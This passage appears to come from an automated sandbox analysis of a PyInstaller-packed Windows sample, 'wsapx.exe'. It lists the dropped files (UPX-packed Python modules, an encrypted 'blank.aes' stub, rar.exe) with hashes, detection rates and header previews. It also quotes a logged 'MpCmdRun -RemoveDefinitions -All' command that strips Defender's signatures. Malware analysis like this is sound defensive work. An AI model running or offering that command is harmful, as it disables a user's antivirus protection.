SHA1:	ACD366990672B584E9EAB8544E9063EB4E68BE3B
SHA-256:	98D16076DCCFB10B88654A40E902246A1E90C9F1229AA1A8B656223389624CD5
SHA-512:	0645F8A0ED215A1C4C49F970D9B696B4A2DF108457B35DCD508DDA3D6D394F8B3B09E1290B397B993A54AD3573A5C9CD03C99C1B8385BE4D851BB8994FD0DC76
Malicious:	false
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. D.e.c. .. 1.3. .. 2.0.2.4. .0.2.:.3.7.:.3.4.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. F.r.i. .. D.e.c. .. 1.3. .. 2.0.2.4. .0.2.:.3.7.:.3.4.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

C:\Users\user\AppData\Local\Temp\RES226F.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4c2, 9 symbols, created Fri Dec 13 09:31:48 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1384
Entropy (8bit):	4.118376320267432
Encrypted:	false
SSDEEP:	24:HhW9vaVyaHJwK4aQMamNwI+ycuZhNVIakS0dPNnqSid:7VHSKd5m1ulVIa30HqSy
MD5:	6EE9201CDDE50C73487F96ECEFAFEDD3
SHA1:	28E04BC9E41F884AB3D6D5DACDA6B001A91C0601
SHA-256:	21D73E743E1D41F09962F67CE14EC4150AA410E221840397BCB3EF419162AD3E
SHA-512:	8C48C21B7142E020AEA20D4CC0E361D65C5352C80730F7CE583CAB714F21CCFBAA29F214B9B85BFDA2503466FC13471BA6B67B5F875CBAB90F8B3A4C0441173E
Malicious:	false
Preview:	L.....[g.............debug$S............................@..B.rsrc$01........X.......h...........@..@.rsrc$02........P...r...............@..@........W....c:\Users\user\AppData\Local\Temp\uses4c50\CSCF61F15A833E5414089F1F2D7C06D86CA.TMP................>[.N..(..w...............7.......C:\Users\user\AppData\Local\Temp\RES226F.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.s.e.s.4.c.5.0...d.l.l.....(.

C:\Users\user\AppData\Local\Temp\_MEI73722\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\Desktop\wsapx.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	109392
Entropy (8bit):	6.641929675972235
Encrypted:	false
SSDEEP:	1536:GcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/woecbq8qZHg2zuCS+zuecL:GV3iC0h9q4v6XjKwoecbq8qBTq+1cL
MD5:	4585A96CC4EEF6AAFD5E27EA09147DC6
SHA1:	489CFFF1B19ABBEC98FDA26AC8958005E88DD0CB
SHA-256:	A8F950B4357EC12CFCCDDC9094CCA56A3D5244B95E09EA6E9A746489F2D58736
SHA-512:	D78260C66331FE3029D2CC1B41A5D002EC651F2E3BBF55076D65839B5E3C6297955AFD4D9AB8951FBDC9F929DBC65EB18B14B59BCE1F2994318564EB4920F286
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: lz4wnSavmK.exe, Detection: malicious, Browse Filename: WVuXCNNYG0.exe, Detection: malicious, Browse Filename: dipwo1iToJ.exe, Detection: malicious, Browse Filename: Counseling_Services_Overview.docm, Detection: malicious, Browse Filename: uOsIQqfgiT.exe, Detection: malicious, Browse Filename: saiya.exe, Detection: malicious, Browse Filename: RuntimeusererVers.exe, Detection: malicious, Browse Filename: OBS-Studio-30.2.3-Windows-Installer.exe, Detection: malicious, Browse Filename: BrowserUpdate.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........u...u...u.E.t...u.....u...t...u..v...u..q...u..p...u..u...u......u..w...u.Rich..u.........PE..d..._#;..........." ...".....`......................................................=.....`A........................................`C..4....K...............p.......\..PO...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata.......p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI73722\_bz2.pyd

Download File

Process:	C:\Users\user\Desktop\wsapx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	49944
Entropy (8bit):	7.78315600372484
Encrypted:	false
SSDEEP:	1536:U/onT0xi3xXtfwYf5CVW3Bd7IGCVwU7SyixL7:U/k538e5CIRlIGCVwUO7
MD5:	85C70974FAC8E621ED6E3E9A993FBD6F
SHA1:	F83974E64AA57D7D027B815E95EBD7C8E45530F1
SHA-256:	610983BBCB8EE27963C17EAD15E69AD76EC78FAC64DEB7345CA90D004034CDD6
SHA-512:	142792750E4A5189DBEAA710E3F5B3689D593927EA77DED00EB5CAADA6B88D82A37459770845F1EA7C9F45DA5A6AE70E19BFCF76D9F1A56184C3164B736BCB18
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w.l.3...3...3...:...9......1......0......>......;......7.......0...x...1...3...l.......;.......2.......2.......2...Rich3...................PE..d...f..e.........." ...#.............e....................................................`.............................................H.................... ..,...................................................q..@...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI73722\_ctypes.pyd

Download File

Process:	C:\Users\user\Desktop\wsapx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	60696
Entropy (8bit):	7.822236524949101
Encrypted:	false
SSDEEP:	1536:WbK/YBHE2gCtX+/9zyeoVIkwLMzKep8z+IGLPAt7SyWxU:WGAK2ghtGIk6MeeGyIGLPAtz
MD5:	E7EF30080C1785BAF2F9BB8CF5AFE1B2
SHA1:	B7D7D0E3B15DE9B1E177B57FD476CECBDD4FCB79
SHA-256:	2891382070373D5070CB8FD6676AFC9F5EB4236251F8FC5C0941AF0C53A2D31E
SHA-512:	C2EC431D2821879BB505D8ECA13FA3921DB016E00B8674FA62B03F27DC5CEE6DD0DE16BA567D19D4B0AF9A5CB34D544383A68CC63FF2FA9D8BB55E356D0D73E6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......>...z.z.z.s...\|....x....v....r....~.....x.1...{.1...\|.....y.z.......\|.....{...o.{.....{.Richz.................PE..d...c..e.........." ...#.............-.......................................P............`.........................................HL.......I.......@.......................L.......................................9..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI73722\_decimal.pyd

Download File

Process:	C:\Users\user\Desktop\wsapx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	108312
Entropy (8bit):	7.9301662560961494
Encrypted:	false
SSDEEP:	3072:HnHQe/FKYjTnmuJkv4D5ZIBGeKHC6ajQ6BWIGOqmbtbb9:HnHQe/MYjTnDJRX6Ge16ehbhx
MD5:	3923E27B9378DA500039E996222FFEE6
SHA1:	A9280559A71ABF390348E1B6A0FB1F2409649189
SHA-256:	0275B03041F966E587D1C4C50266C3FDFF1E1A65F652AD07B59CB85845B5457E
SHA-512:	051C613403FD80B9582DD48C1F38870CB26846D54B75603EA52A78202A72272107E95750DE78CD8F6C56951EBDE501B4892D90FB306326B86124C8CC97BCA594
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@.R.!...!...!...Y=..!..+]...!..+]...!..+]...!..+]...!..M\...!...Y...!...!...!..M\...!..M\...!..M\...!..M\Q..!..M\...!..Rich.!..........PE..d...T..e.........." ...#.p...................................................0............`..........................................,..P....)....... ...........'...........-..........................................@...........................................UPX0....................................UPX1.....p.......f..................@....rsrc........ .......j..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI73722\_hashlib.pyd

Download File

Process:	C:\Users\user\Desktop\wsapx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36120
Entropy (8bit):	7.670480771561197
Encrypted:	false
SSDEEP:	768:6EKW7574DsajR20fnfPHz8HLP8pfbnIGOINg5YiSyvIAMxkE3n1:jKW7hq00fnTQEbnIGOINy7Sy+xzn1
MD5:	C8B153F0BE8569CE2C2DE3D55952D9C7
SHA1:	0861D6DCD9B28ABB8B69048CAF3C073E94F87FDC
SHA-256:	AF9F39D2A5D762214F6DE2C8FEC0A5BC6BE0B8223EF47164CAA4C6E3D6437A58
SHA-512:	81CCBFFF0F4CDD1502AF9D73928B940098B9ACC58B19C1A939ECDF17418096294AF4A4529EE7A0BBE1C686E3B0254651E211C1093264D1835065A82711AC0379
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........u...&...&...&.U&...&u..'...&u..'...&u..'...&u..'...&...'...&...'...&...&M..&...'...&...'...&..9&...&...'...&Rich...&........PE..d......e.........." ...#.P.........../.......................................P............`.........................................\|K..P....I.......@.......................K.......................................;..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........@.......R..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI73722\_lzma.pyd

Download File

Process:	C:\Users\user\Desktop\wsapx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	87832
Entropy (8bit):	7.917277859124498
Encrypted:	false
SSDEEP:	1536:cjQY6vZR307kwHMn3NsbM5PlvQzSqoSdPN1uruZkU2D90nGt4pcgIGZ1rA7SyTx7:EQY6nEZe3NsbI1QzSwlaugudNIGZ1rAP
MD5:	BC2EBD2A95619AB14A16944B0AB8BDE5
SHA1:	C31BA45B911A2664FC622BB253374AB7512FC35A
SHA-256:	AEB3FD8B855B35204B5088C7A1591CC1CA78FFFE707D70E41D99564B6CB617C6
SHA-512:	86A6685EFEC72860991C0F0FA50F46A208211D3F8FC44012B12437D141C5F1A24C34A366F164D225869680707B482AB27A2720C698EBE8026F1C5807E81F8437
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........TB#.5,p.5,p.5,p.M.p.5,p.I-q.5,p.I)q.5,p.I(q.5,p.I/q.5,pnH-q.5,p.M-q.5,p.5-p.5,pnH!q.5,pnH,q.5,pnH.p.5,pnH.q.5,pRich.5,p........PE..d......e.........." ...#. ...............................................................`.........................................4...L....................P.........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI73722\_queue.pyd

Download File

Process:	C:\Users\user\Desktop\wsapx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26904
Entropy (8bit):	7.418027428269828
Encrypted:	false
SSDEEP:	768:Xzh/iDHAPcpqyIGQUNz5YiSyvHAMxkEJ5YSv:jhiDHAP5yIGQUN97SyPx/Y+
MD5:	FCBB24550F59068A37EA09A490923C8A
SHA1:	1E51D9C156354E00909C9F016DDB392A832F8078
SHA-256:	DE2AC6D99234A28DCF583D90DCA7256DE986FCA9E896C9AAFD1F18BB536978B8
SHA-512:	62474BF9D5F39591240F71FD9270FCC7A2B2C0B4A1F93CBB57021040AD85B3AB8C401D17AEDF0141105118772F453C6137A026736F069CC7A965CB30E5479F07
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B:W\.[9..[9..[9..#...[9..'8..[9..'<..[9..'=..[9..':..[9..&8..[9.M#8..[9..[8.M[9..&4..[9..&9..[9..&...[9..&;..[9.Rich.[9.........................PE..d...Y..e.........." ...#.0...............................................................`.............................................L.......P............`..............<..........................................@...........................................UPX0....................................UPX1.....0.......*..................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI73722\_socket.pyd

Download File

Process:	C:\Users\user\Desktop\wsapx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	45336
Entropy (8bit):	7.7177626825594965
Encrypted:	false
SSDEEP:	768:O1X8HEfobVbgwsIZsQD182/q2vQttkmnIzPnzTpwOgIGLwgBT5YiSyvvBAMxkEn:CXz0gwsGsQD1ZbmiSOgIGLwgBd7SyZxL
MD5:	F6D0876B14BCA5A264EC231895D80072
SHA1:	D68B662CFC247C07851EF0764FE9652E3E2C0981
SHA-256:	BCBF9A952473E53F130CE77B0DB69FE08C5845CE10DBE8C320B40F171A15D6A8
SHA-512:	1DB02975634FFCC4E73FAC355D7F67A915C3B4189FEAF9E7B24EF831E9F4A2E60A4BD1EBFD8157282A4094814332D62957FCD204B20F2904527E203AB355AB8E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J./.+z\|.+z\|.+z\|.S.\|.+z\|.W{}.+z\|.W.}.+z\|.W~}.+z\|.Wy}.+z\|}V{}.+z\|.+{\|.+z\|.S{}.+z\|}Vw}.+z\|}Vz}.+z\|}V.\|.+z\|}Vx}.+z\|Rich.+z\|................PE..d......e.........." ...#.p.......... q....................................................`.........................................D...P....................0......................................................0}..@...........................................UPX0....................................UPX1.....p.......p..................@....rsrc................t..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI73722\_sqlite3.pyd

Download File

Process:	C:\Users\user\Desktop\wsapx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	59160
Entropy (8bit):	7.835515959807496
Encrypted:	false
SSDEEP:	1536:e5ovI/e3wTAiHXhchuXbLfbmmKTnjBChRDLHKVIGOQQm7Syxx2e:e5fXAcew9KTjBCh1kIGOQQml
MD5:	0FDEDCB9B3A45152239CA4B1AEA4B211
SHA1:	1CCFF1F5E7B27C4156A231AD7A03BCC9695C5B92
SHA-256:	0FC03D25467850181C0FC4F0F8919C8C47CBA2BF578698D4354AA84FD810C7F7
SHA-512:	8CE5B38EE64AC0CDA831B6B2C746FB95BAADDA83665D8E125EAA8B4A07CB61B3EF88D60741B978B2108EC08B067F1C9C934099F539B1E24F55E3CA8350359611
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@.g...g...g.......g..../..g......g....+..g....*..g....-..g..q./..g..../..g...g/..f..q.#..g..q....g..q...g..q.,..g..Rich.g..........PE..d......e.........." ...#.........p.. ........................................@............`..........................................;..P....9.......0..........8............;...................................... %..@...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI73722\_ssl.pyd

Download File

Process:	C:\Users\user\Desktop\wsapx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	67352
Entropy (8bit):	7.856108604878049
Encrypted:	false
SSDEEP:	1536:URuyAdinkEweTTDWPnQfNnPAdu8LfPXrBIGC777m7Synx5:2F9fEo58DPXdIGC77yN
MD5:	53996068AE9CF68619DA8CB142410D5E
SHA1:	9EB7465D6F22AB03DAC04CFCE668811A87E198F2
SHA-256:	CBD320C42277086CD962FD0B25842904CEB436346D380319625F54363F031DCF
SHA-512:	D5FBC53A2FFFECB1F3DA4B126E306961DE3B8070B5F722B6ED5E20BEF6AF48D52EDF96C975F68278E337BC78A25B4227E9EB44B51BAA786365A67CF977E4643E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U.k.4.8.4.8.4.8.L)8.4.8.H.9.4.8.H.9.4.8.H.9.4.8.H.9.4.8kI.9.4.8.4.8#5.8.L.9.4.8kI.9.4.8kI.9.4.8kIE8.4.8kI.9.4.8Rich.4.8........................PE..d......e.........." ...#.........@.......P...................................0............`.........................................l,..d....)....... ..........8............,..........................................@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip

Download File

Process:	C:\Users\user\Desktop\wsapx.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1329520
Entropy (8bit):	5.586655762137983
Encrypted:	false
SSDEEP:	12288:uttcY+b+vOmgRF1+fYNXPh26UZWAzCu7j5D95wdgkVodYOPjwwMJ9gCCaYc2I:uttcY+mHCiCA5TNqodYOPEPEaYc2I
MD5:	898E35281A756640780DBC31A0B78452
SHA1:	845B59CFD9FB152725F250A872E9D1D7A66AF258
SHA-256:	0DAA440C78582A693DABBC2325A06D817131BB170BAD436B126BAD896F1377CD
SHA-512:	421CC4A15E94293E53F1039B8BB5BE7EDCBC8E3E0E4ABC7F34FAF991993F51CB5F51493B58BB341CB9579347EC134B02104454075A8E7E33E45B8E3A66A44D79
Malicious:	false
Reputation:	unknown
Preview:	PK..........!.x[_C............_collections_abc.pyc......................................Z.....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.............Z...e.d.........Z.d...Z...e.e.........Z.[.g.d...Z.d.Z...e...e.d.................Z...e...e...e.........................Z...e...e.i.j%..........................................Z...e...e.i.j)..........................................Z...e...e.i.j-..........................................Z...e...e.g.................Z...e...e...e.g.........................Z...e...e...e.d.........................Z...e...e...e.d.d.z...........................Z...e...e...e.........................Z...e...e.d.................Z ..e...e.d.................Z!..e...e...e"........................Z#..e.i.j%..................................Z$..e.i.j)..................................Z%..e.i.j-..................................Z&..e.e.jN..........................Z(..e...d...................Z)d...Z..e........Z..e.e........Z+ejY............................[d...Z-..e-........

C:\Users\user\AppData\Local\Temp\_MEI73722\blank.aes

Download File

Process:	C:\Users\user\Desktop\wsapx.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	118027
Entropy (8bit):	7.698356724097063
Encrypted:	false
SSDEEP:	1536:B9JWp8bQqPBPzPjKOwARekWb/QNIb+vKJZEcBXGKRvZacnSpFTU+kEiJ2dwPPRD4:y8h/zNdOYNIgaZ3NGU0w1Eldw3nZc
MD5:	0F87C27F0C81666BF048C739C1AB6227
SHA1:	AB310C21491E3D150CEDF8B82F8113427BBA8DB3
SHA-256:	A4B0A05F1B62A5F373F5A8ECD77A3AC9685E69BFFC9FCF9A1BDE6E40A786E0DE
SHA-512:	2327D28B3CAA79B85334F9D69C56477F8CF2C1A8CF417B735DEC0883F02689FD72F750BA2C41549A24E094272DE1F43018FCBF3EE9B7041A793D6DDEA613F2EE
Malicious:	false
Reputation:	unknown
Preview:	PK........&..YC.u............stub-o.pyc..........Ug.(...............................e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z.d...Z.d.Z.....e...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j.......

C:\Users\user\AppData\Local\Temp\_MEI73722\libcrypto-3.dll

Download File

Process:	C:\Users\user\Desktop\wsapx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1629464
Entropy (8bit):	7.952620301087112
Encrypted:	false
SSDEEP:	49152:AMyDwbv70aKbP1zkLO5YHLA1CPwDvt3uFlDCZ:kwbv77KbPaqYHLA1CPwDvt3uFlDCZ
MD5:	27515B5BB912701ABB4DFAD186B1DA1F
SHA1:	3FCC7E9C909B8D46A2566FB3B1405A1C1E54D411
SHA-256:	FE80BD2568F8628032921FE7107BD611257FF64C679C6386EF24BA25271B348A
SHA-512:	087DFDEDE2A2E6EDB3131F4FDE2C4DF25161BEE9578247CE5EC2BCE03E17834898EB8D18D1C694E4A8C5554AD41392D957E750239D3684A51A19993D3F32613C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./',.kFB.kFB.kFB.b>..yFB..:C.iFB..:G.gFB..:F.cFB..:A.oFB.kFC..FB. >C.`FB.;A.KFB.;F..EB.;B.jFB.;..jFB.;@.jFB.RichkFB.........................PE..d...x..e.........." ...#. .......`9.0{O..p9.................................. R...........`......................................... .O......O.h.....O.......K.\.............R.......................................O.@...........................................UPX0.....`9.............................UPX1..... ...p9.....................@....rsrc.........O.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI73722\libffi-8.dll

Download File

Process:	C:\Users\user\Desktop\wsapx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	29968
Entropy (8bit):	7.677818197322094
Encrypted:	false
SSDEEP:	768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
MD5:	08B000C3D990BC018FCB91A1E175E06E
SHA1:	BD0CE09BB3414D11C91316113C2BECFFF0862D0D
SHA-256:	135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
SHA-512:	8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI73722\libssl-3.dll

Download File

Process:	C:\Users\user\Desktop\wsapx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	229144
Entropy (8bit):	7.930038440560372
Encrypted:	false
SSDEEP:	3072:SFfmvsqWLSCMT+MyN6Qp2oZqpN+/fvrqknqbf6CjaBGkfPkZAK1ck2kBVfLwOmFd:SFevsT9JN+vyH1nqLr3CPrYBBRcd
MD5:	6EDA5A055B164E5E798429DCD94F5B88
SHA1:	2C5494379D1EFE6B0A101801E09F10A7CB82DBE9
SHA-256:	377DA6175C8A3815D164561350AE1DF22E024BC84C55AE5D2583B51DFD0A19A8
SHA-512:	74283B4051751F9E4FD0F4B92CA4B953226C155FE4730D737D7CE41A563D6F212DA770E96506D1713D8327D6FEF94BAE4528336EBCFB07E779DE0E0F0CB31F2E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T..T..T..].3.Z....V......V....X....\....P....W..T..I....e....U.._.U....U..RichT..........PE..d......e.........." ...#.....P...p...r....................................................`............................................,C......8............ ..pM...................................................~..@...........................................UPX0.....p..............................UPX1................................@....rsrc....P.......L..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI73722\python312.dll

Download File

Process:	C:\Users\user\Desktop\wsapx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1826072
Entropy (8bit):	7.993990461497291
Encrypted:	true
SSDEEP:	49152:fTBxkJIkNEakpCPK1JQyHi3p70PHY6/g7:teFNlUsK1ij31WYUW
MD5:	86D9B8B15B0340D6EC235E980C05C3BE
SHA1:	A03BDD45215A0381DCB3B22408DBC1F564661C73
SHA-256:	12DBBCD67015D6CDB680752184107B7DEB84E906B0E8E860385F85D33858A5F6
SHA-512:	D360CC3F00D90FD04CBBA09D879E2826968DF0C1FDC44890C60B8450FE028C3E767450C3543C62D4F284FB7E004A9A33C52538C2279221EE6CBDB1A9485F88B2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................m.................x...s...x......x......x......Rich............PE..d...=..e.........." ...#.........@Q...l..PQ...................................m...........`.........................................H/l......)l...... l......``..V............l. ...........................0.l.(...p.l.@...........................................UPX0.....@Q.............................UPX1.........PQ.....................@....rsrc........ l.....................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe

Download File

Process:	C:\Users\user\Desktop\wsapx.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	630736
Entropy (8bit):	6.409476333013752
Encrypted:	false
SSDEEP:	12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
MD5:	9C223575AE5B9544BC3D69AC6364F75E
SHA1:	8A1CB5EE02C742E937FEBC57609AC312247BA386
SHA-256:	90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
SHA-512:	57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI73722\rarreg.key

Download File

Process:	C:\Users\user\Desktop\wsapx.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	456
Entropy (8bit):	4.447296373872587
Encrypted:	false
SSDEEP:	12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
MD5:	4531984CAD7DACF24C086830068C4ABE
SHA1:	FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
SHA-256:	58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
